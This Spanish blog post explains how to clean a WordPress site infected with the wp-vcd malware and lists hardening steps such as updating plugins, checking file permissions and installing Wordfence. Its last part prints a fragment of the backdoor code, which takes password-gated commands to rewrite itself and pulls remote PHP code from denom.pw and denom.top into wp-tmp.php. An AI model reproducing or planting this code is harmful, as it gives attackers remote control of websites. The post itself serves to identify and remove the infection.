Mantenimiento pagina web wordpress

Mantenimiento pagina web wordpress

12 Ago Mantenimiento pagina web wordpress

Posted at 11:40h in Wordpress by

Mantenimiento pagina web wordpress

 

Mantenimiento pagina web wordpress

 

¿En alguna ocasión haciendo un mantenimiento web os habéis encontrado con un malware?

Yo si y la verdad que al principio no sirve con restaurar copia de seguridad de tu web. ¿Porque? Porque sigue estando la puerta abierta trasera por donde entrar. Entonces ¿que hacemos?.

  • Descargar por FTP todos los archivos.
  • Descargar la base de datos.
  • Descargar sino lo tenéis Sublime.
  • Abrimos Sublime y cargarnos el wordpress en folder.
  • Y empezamos a buscar lineas de código malicioso.

Si encuentras código como el que te voy a poner es porque tienes la web infectada.

Esto suele pasar por descargar plugins o themes desde sitios web no comunes o nulles.

  1. Primero mira en wp-includes y tendrás que borrar los wp-vcd.php y wp-tmp.php
  2. En wp-includes abrimos post.php y borramos  –>  (if (file_exists(dirname(FILE) . ‘/wp-vcd.php’)) include_once(dirname(FILE) . ‘/wp-vcd.php’);)
  3. En funtions.php y borramos este código.
  4. Con esto ya deberías de tener limpio tu wordpress

Datos importantes de mantenimiento pagina web en wordpress.

Es importante tener todos los plugins actualizados y las versión de php + el theme de wordpress.

También hay plugins de seguridad de wordpress que ayudan a combatir todos aquellos ataques producidos por script.

Podéis también poner recapcha en los formularios.

  • Analiza tu web con esta web.
  • Analiza tu web con esta otra web también.
  • Revisa los permisos en las carpetas mediante FTP fuera de 755 o 644 es que hay algo que no va bien si ves 777 a explotado la bomba.
  • Revisa archivos htacces y sus directivas
  • Revisa la tabla en base de datos phpadmin wp_user que no hayan mas user creados que los que tu has creado.
  • Quita wp-admin
  • Quita user admin
  • Cierra puertas como comentarios.
  • Cambia claves de acceso.
  • Pon https
  • Pasale el antivirus de tu pc de normal revisa todo lo malicioso.
  • Instala Wordfence detecta archivos maliciosos y te lo chivara.
    • Te muestra el archivo localizado como sospechoso
    • Te indica el grado de severidad
    • Se facilita detalles del patron de código malicioso que ha encontrado
    • Te facilita herramientas para ver el código del archivo (view the file) y para eliminarlo directamente (Delete this file)
  • Instala plugin Tac para ver las vulnerabilidades de los archivos.
    • Este plugin te ayudará a detectar si tu tema de WordPress tiene código malicioso inyectado en sus archivos. Realmente útil y práctico.

Con esta pequña guia espero que hayas resuelto por lo menos lo mas importante, ya que hay que estar seguros y tener seguros a quienes confían en nosotros y dejan sus tiendas online, paginas web en mantenimiento.

 

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '429acb1c29e4800452a3538a8f91edd0'))
{
$ div_code_name=" wp_vcd ";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
//www.denom.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
} elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif (($tmpcontent = @file_get_contents("http://www.denom.top/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.denom.top/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
//wp_tmp
//$end_wp_theme_tmp

 

Publicaciones relacionadas:

wordpressPoner entradas en el blog de wordpress analyticsGuía de WooCommerce Subscriptions para Pagos Automáticos y Recurrentes
Print page
0 Likes


Abrir chat
Hola
¿En qué podemos ayudarte?